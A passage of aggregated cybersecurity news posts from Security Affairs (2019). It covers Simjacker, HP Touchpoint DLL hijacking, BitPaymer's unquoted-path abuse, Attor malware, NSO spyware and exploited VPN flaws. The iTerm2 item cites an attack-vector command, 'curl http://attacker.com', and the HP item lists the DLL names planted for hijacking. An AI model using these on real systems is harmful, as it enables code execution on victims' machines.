Since S@T Browser implements a series of STK instructions (i.e. send, call, launch browser, provide local data, run command, and send data) that can be executed by sending an SMS to the phone.

The Simjacker attack involves an SMS containing commands that instruct the SIM Card in the phone to ‘take over’ the phone.

The attacker could exploit the flaw to

  • Retrieve targeted device’ location and IMEI information,
  • Spread mis-information by sending fake messages on behalf of victims,
  • Perform premium-rate scams by dialing premium-rate numbers,
  • Spy on victims’ surroundings by instructing the device to call the attacker’s phone number,
  • Spread malware by forcing victim’s phone browser to open a malicious web page,
  • Perform denial of service attacks by disabling the SIM card, and
  • Retrieve other information like language, radio type, battery level, etc.

On October 3rd, the experts presented their research at VB2019 conference in London and they published a technical paper on the attack. The paper shows how the flaw is being exploited by threat actors and privides technical details on technologies used in the attacks.  report.

The experts explained that the attack is transparent to the users, the targets are not able to notice any anomaly.

Adaptive Mobile revealed that a private surveillance firm was aware of the zero-day flaw since at least two years and is actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

“Within the report we outline why we think it is a surveillance company that developed this exploit.” read a FAQs page published by the experts. “However, we have not named the specific company that we believe is responsible, as to do so, we would need to release some additional proof. That proof would also reveal specific methods and information that would impact our ability to protect subscribers.”

Experts also added that the vulnerability has been likely exploited by nation-state actors for targeted attacks on persons of interests.

After the flaw was publicly disclosed, the researchers at SRLabs developed an Android app, named SnoopSnitch, that can detect Simjacker-like attacks. The SnoopSnitch app only runs on rooted Android mobile phones with a Qualcomm chipset. SRLabs researchers also updated their SIMTester app to include Simjacker.

Experts at Adaptive Mobile also analyzed the impact of the recently disclosed WIBattack and explained that it impacts a smaller number of users compared with SimJacker. Experts estimated that only 8 operators in 7 countries are using SIM cards vulnerable to the attack.

“WIB is a propriety SIM card technology like S@T which reports show could also be exploited via ‘Simjacker-like’ attacks. However, it’s important to state that we haven’t seen any attacks involving WIB.” concludes the report. “The WIB technology itself seems less prevalent that the S@T Browser (see diagram below and section 7 of the report), and available publicly information doesn’t indicate that WIB has the same apparent oversight in recommended security level.”

The following graph shows the number of Vulnerable Countries & Operators for S@T Browser and WIB.

“This has important implications for all Mobile Operators if they wish to deal with attacks from threat actors like this in the future.” concludes the report.”It means that previous ways of relying on recommendations, with no operational investigation or research won’t be enough to protect the mobile network and its subscribers, and what’s worse, will give a false sense of security.”

Pierluigi Paganini

(SecurityAffairs – SimJacker, hacking)

The post SIM cards used in 29 countries are vulnerable to Simjacker attack appeared first on Security Affairs.

Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics

SafeBreach experts discovered that the HP Touchpoint Analytics service is affected by a potentially serious vulnerability.

Security researchers at SafeBreach have discovered that the HP Touchpoint Analytics service is affected by a serious flaw tracked as CVE-2019-6333. The vulnerability received a CVSS score of 6.7 (medium severity).

The TouchPoint Analytics is a service that allows the vendor to anonymously collect diagnostic data about hardware performance, it comes pre-installed on most HP PCs.

HP Touchpoint Analytics

The service is based on the open-source tool Open Hardware Monitor and it is executed as “NT AUTHORITY\SYSTEM.”

The experts noticed that when the service is started, it attempts to load three missing DLL files. An attacker with administrative privileges on the targeted system can create malicious DLLs with the names of the missing files and place them in the locations where they were expected to be to get executed when the HP service starts.

The experts pointed out that the Touchpoint Analytics service would have high-permission-level access to the PC hardware, this means that a flaw affecting the could be exploited to escalate privileges to SYSTEM and bypass security features.

“The Open Hardware Monitor library provides a signed kernel driver named “WinRing0,” which is extracted and installed during runtime.” reads the analysis published by the experts.

“As you can see, the service was trying to load three missing DLL files, which eventually were loaded from the c:\python27 directory – our PATH environment variable:

  1. atiadlxx.dll
  2. atiadlxy.dll
  3. Nvapi64.dll

The researchers also published a PoC code to show how to use the Open Hardware Monitor library to read and write to physical memory.

The flaw could impact tens of millions of computers running the HP Touchpoint Analytics or Open Hardware Monitor.

“A potential security vulnerability has been identified with certain versions of HP Touchpoint Analytics prior to version 4.1.4.2827.” reads the security advisory published by HP. “This vulnerability may allow a local attacker with administrative privileges to execute arbitrary code via an HP Touchpoint Analytics system service.”

The experts reported the flaw to HP in early July and it was addressed this month with the release of version 4.1.4.2827.

Pierluigi Paganini

(SecurityAffairs – Touchpoint Analytics, hacking)

The post Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics appeared first on Security Affairs.

Researchers released a free decryptor for the Nemty Ransomware

Good news for the victims of the Nemty Ransomware, security researchers have released a free decryptor that could be used to recover files.

I have great news for the victims of the recently discovered Nemty Ransomware, security researchers have released a free decryptor tool that could be used to recover files.

In mid-August, the Nemty ransomware appeared in the threat landscape, the name of the ransomware comes after the extension it adds to the encrypted file names. The malicious code also deletes their shadow copies to make in impossible any recovery procedure.

Below the ransom note dropped by the Nemty ransomware after the encryption process is completed. Attackers demand the payment of a 0.09981 BTC ransom (roughly $1,000) through a portal hosted on the Tor network.

Nemty ransomware

Crooks used multiple attack vectors to distribute the ransomware, according to the popular malware researcher Vitali Kremez, the ransomware is mainly dropped via compromised remote desktop connections.

Now researchers from the security firm Tesorion have developed a decryptor tool that works on Nemty versions 1.4 and 1.6, they also announced a working tool for version 1.5.

The security form is also working with Europol to get its decryptors included in their NoMoreRansom project.

“As 1.6 is the most recent version of the two, we have been focussing our efforts on this version first. We now have a working decryptor for version 1.6. Please contact Tesorion CSIRT to obtain our decryptor for free if you are a victim of Nemty 1.6. We are also finishing our decryptor for Nemty 1.5 and expect to release it soon as well.” reads the post published by Tesorion.

The decryptor currently supports only a limited number of file extensions, anyway, researchers are working to improve it and support other file types.

Tesorion is not allowing victims to generate the decryption keys with their client, instead, it is allowing victims to retrieve the decryption key by generating it on its own servers.

Victims can contact the Tesorion CSIRT and request help with the Nemty Ransomware, in turn the company will then send a link to the decryptor that will allow you to decrypt the files.

“Tesorion told BleepingComputer they went this route in order to prevent the ransomware developers from analyzing the decryptor and learning the weakness in their algorithm.” reported BleepingComputer.

Victims can upload their files on the Tesorion serves that will use it to calculate the decryption key, then the key is sent back to the victims that can load is in the decryptor.

Pierluigi Paganini

(SecurityAffairs – Nemty ransomware, malware)

The post Researchers released a free decryptor for the Nemty Ransomware appeared first on Security Affairs.

Top cybersecurity certifications to consider for your IT career

With the right cybersecurity certifications, you can attain your goals seamlessly and in a fast way and speed up your career.

Cyber attacks are making headlines almost every day in today’s era. The attacks have increased both in number and complexity. Because of this natural demand, it is now crucial for companies and specialized firms to reinforce and invest in professionals to face a problem that technology can’t solve.

Being a professional within the field, a curious person, or even someone that wishes to work in the field, there are a lot of cybersecurity certifications you need to consider in order to improve your skills. Earning a certification in this field is an excellent way to boost your career potentials. With the right cybersecurity certifications, you can attain your goals seamlessly and in a fast way.

From my point of view, one of the ways you can make gown your career is by investing your time and money and getting a certification that will truly improve your skills, knowledge and, thus, developing a new mindset to face everyday challenges.

There are exceptional cybersecurity certifications you should check out as they can be the golden ticket to your next job role.

Certified Ethical Hacker – CEH

A Certified Ethical Hacker is a skilled professional who understands and knows how to find weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner to assess the security posture of a target system(s). The CEH credential certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective.


Certified Information Security Manager – CISM

ISACA®’s Certified Information Security Manager® (CISM®) certification instantly validates your skills and expertise in information security management. It proves you can plan and institute information security programs and practices that prevent security breaches and quickly mitigate damage should a breach occur. That’s why hiring managers and clients look for it and many businesses and government agencies require it.


CompTIA Security+

CompTIA Security+ is the first security certification IT professionals should earn. This certification establishes the core knowledge required by any cybersecurity role and provides a springboard to intermediate-level cybersecurity jobs. Security+ incorporates best practices in hands-on trouble-shooting to ensure security professionals have practical security problem-solving skills. Cybersecurity professionals with Security+ know how to address security incidents – not just identify them.


SANS GIAC Security Essentials – GSEC

The GIAC Security Essentials (GSEC) certification validates a practitioner’s knowledge of information security beyond simple terminology and concepts. GSEC certification holders are demonstrating that they are qualified for hands-on IT systems roles with respect to security tasks.


Offensive Security Certified Professional – OSCP

The OSCP examination consists of a virtual network containing targets of varying configurations and operating systems. At the start of the exam, the student receives the exam and connectivity instructions for an isolated exam network that they have no prior knowledge or exposure to. The successful examinee will demonstrate their ability to research the network (information gathering), identify any vulnerabilities and successfully execute attacks. This often includes modifying exploit code with the goal to compromise the systems and gain administrative access.

The candidate is expected to submit a comprehensive penetration test report, containing in-depth notes and screenshots detailing their findings. Points are awarded for each compromised host, based on their difficulty and level of access obtained.


Certified Cloud Security Professional – CCSP

Earning the globally recognized CCSP cloud security certification is a proven way to build your career and better secure critical assets in the cloud.

The CCSP shows you have the advanced technical skills and knowledge to design, manage and secure data, applications, and infrastructure in the cloud using best practices, policies and procedures established by the cybersecurity experts at (ISC)².

Certified Information Systems Security Professional – CISSP

The Certified Information Systems Security Professional (CISSP) certification is considered the gold standard in the field of information security. This CISSP certification training course is aligned with (ISC)² CBK 2018 requirements and will train you to become an information assurance professional who defines all aspects of IT security, including architecture, design, management, and controls. Most IT security positions require or prefer a CISSP certification, so get started with your CISSP training today.

Cybersecurity, like many other areas of IT, has grown to the point where certifications have been proliferating in recent years. As in other areas in IT, security is crucial and certifications can help you verify your high-end skill set.

About the Author

cybersecurity certifications

Pedro Tavares is a cybersecurity professional and a founding member and Pentester of CSIRT.UBI and the founder of seguranca-informatica.pt.

In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, hacking, cybersecurity, IoT and security in computer networks.  He is also a Freelance Writer.

Pierluigi Paganini

(SecurityAffairs – cybersecurity certifications)

The post Top cybersecurity certifications to consider for your IT career appeared first on Security Affairs.

Hacker breached escort forums in Italy and the Netherlands and is selling user data

Popular prostitution and escort forums in Italy and the Netherlands have been hacked and data have been offered for sale in the cybercrime underground.

A Bulgarian hacker known as InstaKilla has breached two online escort forums and stole the user information that he is now offering for sale on a hacking forum.

The two escort forums are EscortForumIt.xxx and Hookers.nl, it is used by sex workers and their customers in Italy and the Netherlands, both websites have confirmed the breaches.

Experts reports that also a forum for the Zooville zoophilia and bestiality fans was hacked and data offered for sale.

The Dutch news site NOS revealed that a hacker is selling the Dutch hookers.nl forum database for $300 on online forums. The exposed data includes user names, hashed passwords, and IP addresses for roughly 250,000 members.

The account details of the 250,000 users of the Dutch website Hookers.nl have been leaked. This includes e-mail addresses. The website is popular among visitors to prostitutes and escorts, who exchange experiences and tips.” reported the NOS website.

“A hacker has captured the data from the members and offers it for sale, according to a study by the NOS after reporting an anonymous source.”

The hacker is also selling 33,000 records stolen from the Italian forum.

Both escort forums were running outdated versions of the popular vBulletin forum software. At the end of September, an anonymous hacker disclosed technical details and proof-of-concept exploit code for a critical zero-day remote code execution flaw in vBulletin (CVE-2019-16759). A few days later, the security expert Troy Mursch observed a botnet that it utilizing the recently disclosed vBulletin exploit to secure vulnerable servers to avoid that can be compromised by other threat actors. Likely, the Bulgarian hacker has exploited the same flaw to compromise the escort forums that were not updated by their admins.

“According to a sample of the data obtained by ZDNet, in the case of the Dutch forum, the hacker also appears to have gained access to the site’s internal paid subscription system, although there was no financial information included in the sample we received.” reported ZDNet.

InstaKilla is the same hacker who stole data from millions of Bulgarians in July and sent it to local media, the hacker is now offering for sale data from tens of other vBulletin-based forums.

Users of the escort forums are potentially exposed to extortion phishing campaigns similar to what has happened after the Ashley Madison hack.

Pierluigi Paganini

(SecurityAffairs – escort forums, vBulletin)

The post Hacker breached escort forums in Italy and the Netherlands and is selling user data appeared first on Security Affairs.

Security Affairs 2019-10-11 00:14:11

A vulnerability in Sophos Cyberoam firewalls could be exploited by an attacker to gain access to a target’s internal network without authentication.

Sophos addressed a vulnerability in its Cyberoam firewalls that could be exploited by an attacker to gain access to a company’s internal network without providing a password.

“A critical shell injection vulnerability in Sophos Cyberoam Firewall appliances running CyberoamOS (CROS) version 10.6.6 MR-5 and earlier was recently discovered and responsibly disclosed to Sophos by an external security researcher.” reads the advisory published by Sophos.

“The vulnerability can be potentially exploited by sending a malicious request to either the Web Admin or SSL VPN consoles, which would enable an unauthenticated remote attacker to execute arbitrary commands.”

Cyberoam firewall

The vulnerability is a critical shell injection vulnerability that could allow a remote attacker to gain “root” permissions on vulnerable equipment, it could be exploited by sending malicious commands across the internet.

The vulnerability, tracked as CVE-2019-17059, was discovered by the security expert Rob Mardisalu that reported it to Sophos. The expert also reported the issue to Techcrunch that first reported the news.

“We’ve been working hard with internal and external security researchers to uncover serious remotely exploitable loopholes in SSL VPNs and Firewalls like Cyberoam, Fortigate and Cisco VPNs.” reads the security advisory published by the expert. “This Cyberoam exploit, dubbed CVE-2019-17059 is a critical vulnerability that lets attackers access your Cyberoam device without providing any username or password. On top of that, the access granted is the highest level (root), which essentially gives an attacker unlimited rights on your Cyberoam device.”

Cyberoam firewalls are used in large enterprises, they offer stateful and deep packet inspection for network, application and user identity-based security. Cyberoam Firewall protects organizations from DoS, DDoS and IP Spoofing attacks.

Mardisalu revealed that according to Shodan there are more than 96,000 internet-facing Cyberoam devices worldwide, most of them in enterprises, universities and banks.

The flaw is similar to the recently disclosed vulnerabilities in Palo Alto Networks, Pulse Secure and Fortinet VPN solutions.

“It’s a similar vulnerability to recently disclosed flaws in corporate VPN providers, notably Palo Alto Networks, Pulse Secure and Fortinet, which allowed attackers to gain access to a corporate network without needing a user’s password.” reported TechCrunch “Many large tech companies, including Twitter and Uber, were affected by the vulnerable technology, prompting Homeland Security to issue an advisory to warn of the risks.”

The flaw affects Cyberoam Firewalls running CROS 10.6.6 MR-5 and earlier, Sophos plans to include a fix in the next update of its CyberoamOS operating system.

“There are a small amount of devices that have not as of yet been patched because the customer has turned off auto-update and/or are not internet-facing devices.” said the spokesperson.

The researcher will release the proof-of-concept code in the coming months.

Pierluigi Paganini

(SecurityAffairs – Cyberoam firewalls, hacking)

The post appeared first on Security Affairs.

iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware

The gang behind BitPaymer and ransomware attacks has been found exploiting Windows zero-day for Apple iTunes and iCloud.

The cybercriminals behind BitPaymer and iEncrypt ransomware attacks have been found exploiting a Windows zero-day vulnerability for Apple iTunes and iCloud in attacks in the wild.

The zero-day vulnerability resides in the Bonjour updater that comes packaged with Apple’s iTunes and iCloud software for Windows to evade antivirus detection.

The evasion technique was discovered by researchers at Morphisec while observing an attack against an enterprise in the automotive industry.

“This time we have identified the abuse of an Apple zero-day vulnerability in the Bonjour updater that comes packaged with iTunes for Windows. The Windows exploit is important to note given Apple is sunsetting iTunes for Macs with the release of macOS Catalina this week, while Windows users will still need to rely on iTunes for the foreseeable future.” reads the security advisory published by Morphisec.
“The adversaries abused an unquoted path to maintain persistence and evade detection.”

The Bonjour updater runs in the background and automates multiple tasks, including automatically download the updates for Apple software. Experts pointed out that the Bonjour updater has its own installation entry in the installed software section and a scheduled task to execute the process. This means that even uninstalling iTunes and iCloud doesn’t remove Bonjour updater.

The experts discovered that the Bonjour updater was vulnerable to the unquoted service path vulnerability.

Unquoted search paths are a relatively older vulnerability that occurs when the path to an executable service or program (commonly uninstallers) are unquoted and contain spaces. The spaces can allow someone to place their own executable in the path and get it to be executed instead.

Bonjour was trying to run from the Program Files folder, but due to the unquoted path issue, it instead ran the BitPaymer ransomware that was named Program.

“Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe“. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine.” continues the analysis. “In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.”

bitpaymer campaign

Experts explained that attackers using a legitimate process signed by a trusted vendor, like Bonjour, will be able to execute a new malicious child process evading detection. In this specific attack, security programs have not scanned the malicious payloads because they did not use an extension,

The unquoted service path vulnerability could also be exploited by attackers to escalate privileges.

Morphisec Labs reported their discovery to Apple that released iCloud for Windows 10.7iCloud for Windows 7.14, and iTunes 12.10.1 for Windows to address the vulnerability.

Users that have installed an Apple software on their Windows computer and then uninstalled it, should manually uninstall the Bonjour updater if present.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware appeared first on Security Affairs.

Attor malware was developed by one of the most sophisticated espionage groups

New espionage malware found targeting Russian-speaking users in Eastern Europe

ESET found an advanced malware piece of malware named Attor, targeting diplomats and high-profile Russian-speaking users in Eastern Europe.

ESET researchers discovered an advanced malware piece of malware named Attor, that was used in cyberespionage operations on diplomats and high-profile Russian-speaking users in Eastern Europe.

Attor malware

Threat actors have been using Attor since 2013, the malicious code remained under the radar until last year.

The researchers believe that the threat actor behind Attor a state-sponsored group involved in highly targeted attacks on selected targets.

Attor’s espionage operation is highly targeted – we were able to trace Attor’s operation back to at least 2013, yet, we only identified a few dozen victims.” reads the analysis published by ESET.

“For example, in order to be able to report on the victim’s activities, Attor monitors active processes to take screenshots of selected applications. Only certain applications are targeted – those with specific substrings in the process name or window title.”

The researchers believe that the malware was specifically developed to infect mainly Russian-speaking users, it targets popular Russian apps and services, including the social networks Odnoklassniki, and VKontakt, VoIP provider Multifon, IM apps Qip and Infium, search engine Rambler, email clients Yandex and Mail.ru, and payment system WebMoney.

The malware implements a modular structure with a dispatcher and loadable plugins, all of which are implemented as dynamic-link libraries (DLLs). The attackers first compromise the target dropping the components on disk, then loads the dispatcher DLL.

The Attor malware makes sophisticated use of encryption to hide its components.

The plugins are delivered as DLLs asymmetrically encrypted with RSA, then they are recovered in memory, using the public RSA key embedded in the dispatcher.

“In total, the infrastructure for C&C communication spans four Attor components – the dispatcher providing encryption functions, and three plugins implementing the FTP protocol, the Tor functionality and the actual network communication.” continues the analysis. “This mechanism makes it impossible to analyze Attor’s network communication unless all pieces of the puzzle have been collected. “

“We were able to recover eight of Attor’s plugins, some in multiple versions – we list them in Table 2. Assuming the numbering of plugins is continuous, and that actors behind Attor may use different sets of plugins on a per‑victim basis, we suspect there are even more plugins that have not yet been discovered. ” continues the analysis.

The analysis of the samples of the malware revealed the presence of an interesting module designed to detect when users connected modems and older phones to their devices. The malware is able to collect info about the files present on connected devices.

“The most curious plugin in Attor’s arsenal collects information about both connected modem/phone devices and connected storage drives, and about files present on these drives. It is responsible for collection of metadata, not the files themselves, so we consider it a plugin used for device fingerprinting, and hence likely used as a base for further data theft.” reads the report.

“While Attor’s functionality of fingerprinting storage drives is rather standard, its fingerprinting of GSM devices is unique.”

Attor’s device monitoring module implements a unique fingerprinting feature of GSM devices. Whenever a modem or a phone device is connected to a COM port, Device monitor uses AT commands to communicate with it.

ESET believes that the authors of the Attor malware developed this module to target users owning older mobile handsets, or even a custom GSM-capable platform.

“A more likely explanation of the plugin’s main motive is that it targets modems and older phones. Alternatively, it may be used to communicate with some specific devices (used by the victim or target organization) that are connected to the COM port or to the USB port using a USB-to-serial adaptor.” concludes the analysis. “In this scenario, it is possible the attackers have learned about the victim’s use of these devices using some other reconnaissance techniques.”

Pierluigi Paganini

(SecurityAffairs – Attor, malware)

The post Attor malware was developed by one of the most sophisticated espionage groups appeared first on Security Affairs.

SAP October 2019 Security Patch Day fixes 2 critical flaws

SAP addressed two critical vulnerabilities (Hot News) as part of the October 2019 Security Patch Day.

SAP has released its October 2019 Security Patch Day updates that also address two critical vulnerabilities (Hot News) with CVSS scores of 9.3 and 9.1.

The October 2019 Security Patch Day also includes a High Priority Note addressing Binary Planting vulnerability.

“With only nine new and one updated Security Note, SAP has published an unusually low number of Security Notes for October 2019.” reads the analysis published by security firm Onapsis. “This is the lowest number of newly published notes in the past five years. Nevertheless, with 2 HotNews Notes and one High Priority Note, this Patch Day deserves special attention as an attacker needs only one vulnerability for a successful attack.”

The most severe SAP Security Note is #2826015, a Missing Authentication Check in AS2 Adapter of B2B Add-On for SAP NetWeaver Process Integration. The vulnerability, tracked as CVE-2019-0379, could be exploited by remote attackers to steal or manipulate sensitive data, it could also provide attackers with access to administrative and other privileged functionality.

“The adapter specifies a comprehensive set of data security features, specifically data confidentiality and data authenticity, which are aimed at the B2B commerce environment. The configuration of the AS2 adapter allows two different security providers.” reads the analysis published by Onapsis. “Depending on the selected provider, a Missing Authentication vulnerability exists that can lead to sensitive data theft or data manipulation as well as to access to administrative and other privileged functionalities.”

The vulnerability received a CVSS score of 9.3.

The second Hot News (SAP Security Note #2828682) addresses a flaw tracked as CVE-2019-0380, it is an information disclosure flaw in SAP Landscape Management enterprise edition. the flaw affects version 3.0 and received a CVSS score of 9.1.

“SAP Security Note #2828682 talks about a risk of information disclosure if these custom parameters fulfill specific conditions. SAP describes the overall conditions for the existence of the vulnerability as “uncommon”.  “

The vulnerability is related to the custom parameters that can be added by users to providers assigned to custom operations.

SAP October 2019 Security Patch Day

SAP also addressed a Binary Planting vulnerability in several SAP software products, including Anywhere, SAP IQ and SAP Dynamic Tiering. The flaw tracked as CVE-2019-0381 resides in the file search algorithm of the affected products, it received a CVSS score of 7.8.

“The algorithm searches too many directories, even if they are out of the application scope.” Onapsis explains. “Possible impacts are path traversals and directory climbing, enabling an attacker to read, overwrite, delete, and expose arbitrary files of the system. This can also lead to DLL hijacking as well as to privilege elevation.”

SAP also addressed multiple Cross-Site Scripting (XSS) vulnerabilities in its products, rated as medium, including one in Customer Relationship Management (CVE-2019-0368), and multiple issues in the SAP BusinessObjects Business Intelligence Platform (CVE-2019-0374, CVE-2019-0375, CVE-2019-0376, CVE-2019-0377, and CVE-2019-0378),

The full list of the addressed issues in SAP Security Patch Day – October 2019 is available here.

Pierluigi Paganini

(SecurityAffairs – SAP, hacking)

The post SAP October 2019 Security Patch Day fixes 2 critical flaws appeared first on Security Affairs.

Tor Project is going to remove End-Of-Life relays from the network

Maintainers at the Tor Project have removed from its network more than 800 relay servers running outdated and EOL versions of the Tor software.

Currently, the Tor network is composed of more than 6000 relays, some of them running outdated Tor software versions (in some cases back to the 0.2.4.x versions). Other relays are running the latest Tor software in nightly builds and alpha releases. Maintainers of the Tor Project announced they have removed relay servers running outdated and EOL versions of the Tor software.

Tor Project experts pointed out that they currently maintain only 5 Tor version series, 0.2.9.x (LTS), 0.3.5.x (LTS), 0.4.0.x, 0.4.1.x, 0.4.2.x (Stable on Dec 15th, 2019).

Now the maintainers of the project announced to have removed roughly 13.5% of the relay servers, 750 acting as Tor middle relays and 62 as exit relays.

The presence of End-Of-Life relays in the Tor Network has multiple negative impacts on network stability and security, it also impacts maintenance activities because it is not easy to roll out important fixes and new features for them.

“In the past weeks, we’ve taken steps to contact every relay operator with a valid ContactInfo field to ask them to upgrade to the latest stable release. The Tor relay community was informed via the tor-relays mailing list on September 3rd 2019 of this upcoming change.” reads the announcement published by the Tor Project.

“The End-Of-Life relays in the network currently make up just over 12% of the total bandwidth, or around 750 relays. Out of these, only 62 are Exit relays accounting for only 1.68% of the total Exit traffic. We expect a minor impact on the size of the network, and a small drop in the Metrics graph.”

The maintainers expect a new Tor stable release in November, it will reject End-Of-Life relays by default. Until then, the maintainers will reject obsolete relays using their fingerprints.

Instruction to upgrading End-Of-Life relays are included in the announcement.

Pierluigi Paganini

(SecurityAffairs – Tor, privacy)

The post Tor Project is going to remove End-Of-Life relays from the network appeared first on Security Affairs.

Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware

NSO Group ‘s surveillance spyware made the headlines again, this time the malware was used to spy on 2 rights activists in Morocco according Amnesty International.

Amnesty International collected evidence of new abuses of the NSO Group ‘s surveillance spyware, this time the malware was used to spy two rights activists in Morocco.

Experts at Amnesty International analyzed the device of evidence of Abdessadak El Bouchattaoui and confirmed it was targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.

“After checking his devices for evidence of targeting, Amnesty International was able to confirm that Abdessadak El Bouchattaoui was indeed targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.” reads the analysis published by Amnesty International.

The organization also discovered that the spyware was also used to spy on Maati Monjib, the right group believes the operation is part of state-sponsored repression of human rights defenders.

Bouchattaoui is a lawyer and HRD, in February 2017, a court in Al Hoceima sentenced him to 20 months in prison and a fine for online posts in which he criticized the use of excessive force by the authorities during the social justice protests in the Hirak El-Rif across 2016 and 2017. Monjib is a historian and a columnist, co-founder of the NGO Freedom that in 2015 was accused of threatening the internal security of the state ”through “propaganda.”

NSO Group Pegasus

The victims were targeted with messages related to the Hirak El-Rif movement and the subsequent repression by the Moroccan security forces. The messages included links that once clicked by the victims will start the attack chain that would allow the attacker to remotely control the device.

The links used in these attacks are similar to the ones detected by in June 2018 by Amnesty International in operations against an Amnesty staff member and a Saudi HRD.

“SMS messages sent to Moroccan Human Rights Defenders, as documented in this report, also carry similar links to the same set of Internet infrastructure attributed to NSO Group.” states the report.

“NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising serious concerns that Moroccan security agencies are behind the surveillance,”

NSO Group refuses any accusation and claims that its surveillance technology is only used for lawful purposes. 

In May, Amnesty International filed a lawsuit against Israeli surveillance firm NSO, the lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

Pierluigi Paganini

(SecurityAffairs – NSO Group, hacking)

The post Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware appeared first on Security Affairs.

Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012

Security experts discovered a critical remote code execution vulnerability, tracked as CVE-2019-9535, in the GPL-licensed iTerm2 macOS terminal emulator app.

Security experts at cybersecurity firm Radically Open Security (ROS) discovered a 7-year old critical remote code execution vulnerability in the GPL-licensed iTerm2 macOS terminal emulator app.

The iTerm2 macOS terminal emulator app is one of the most popular open-source replacements for Mac’s built-in terminal app.

The RCE flaw tracked as CVE-2019-9535 was discovered as part of an independent security audit funded by the Mozilla Open Source Support Program (MOSS).

“A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2.” reads the security advisory published by Mozilla. “During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.”

The RCE vulnerability resides in the tmux integration feature of iTerm2, it could be exploited by an attacker to execute arbitrary commands by providing malicious output to the terminal.

The experts published a video PoC that shows how to exploit the vulnerability by producing output to the terminal. Possible attack vectors would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.

“Typically, this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe, there is a high degree of concern about the potential impact,” Mozilla concludes.

The iTerms2 version 3.3.6 addresses the flaw that affects prior versions.

Pierluigi Paganini

(SecurityAffairs – iTerms2, hacking)

The post Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012 appeared first on Security Affairs.

Multiple APT groups are exploiting VPN vulnerabilities, NSA warns

NSA is warning of multiple state-sponsored cyberespionage groups exploiting enterprise VPN Flaws

Last week, the UK’s National Cyber Security Centre (NCSC) reported that advanced persistent threat (APT) groups have been exploiting recently disclosed VPN vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure, to breach into the target networks.

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379,

The CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that could be exploited by an unauthenticated attacker to download FortiOS system files. The CVE-2018-13379 flaw could be exploited to obtain administrator credentials in plain text.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

APT groups also exploit CVE-2018-13382, CVE-2018-13383, and CVE-2019-1579, in Palo Alto Networks products.

The vulnerabilities were first reported in July by researchers Orange Tsai and Meh Chang from DEVCORE that found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents

Microsoft researchers recently reported that the APT5 cyberespionage group (aka MANGANESE) has been exploiting VPN vulnerabilities since July, some weeks before PoC exploits were publicly discosed.

Now NSA is warning of multiple state-sponsored cyberespionage groups exploiting enterprise VPN Flaws

“Multiple Nation State Advanced Persistent Threat (APT) actors have weaponized CVE-2019-11510, CVE-2019-11539, and CVE-2018-13379 to gain access to vulnerable VPN devices.” reads the security advisory published by the NSA.

“If a malicious actor previously exploited the vulnerability to collect legitimate credentials, these credentials would still be valid after patching. NSA recommends resetting credentials after a vulnerable VPN device is upgraded and before it is reconnected to the external network:

  • Immediately update VPN user, administrator, and service account credentials.
  • Immediately revoke and generate new VPN server keys and certificates. This may require redistributing VPN connection information to users.
  • If compromise is suspected, review accounts to ensure no new accounts were created by adversaries.”

Both NCSC or NSA intelligence agencies confirmed that APT groups targeted several sectors, including military, government, academic, business and healthcare. The security advisories published by the agencies did not name any APTs leveraging the above VPN vulnerabilities.

In August, BadPackets experts observed a mass scanning activity targeting Pulse Secure “Pulse Connect Secure” VPN endpoints vulnerable to CVE-2019-11510. At the time, over 14,000 vulnerable Pulse Secure endpoints were hosted by more than 2,500 organizations. The number of vulnerable endpoints dropped to roughky 6,000 by October 8, most of them in the United States, Japan and the UK.

Pierluigi Paganini

(SecurityAffairs – VPN vulnerabilities, hacking)

The post Multiple APT groups are exploiting VPN vulnerabilities, NSA warns appeared first on Security Affairs.

vBulletin addresses three new high-severity vulnerabilities

vBulletin has recently published a new security patch update that addresses three high-severity vulnerabilities in the popular forum software.

vBulletin has recently published a new security patch update that addresses three high-severity flaws in vBulletin 5.5.4 and prior versions.

The vulnerabilities could be exploited by remote attackers to take complete control over targeted web servers and steal sensitive user information.

The first vulnerability, tracked as CVE-2019-17132, is a remote code execution flaw reported by security researcher Egidio Romano.

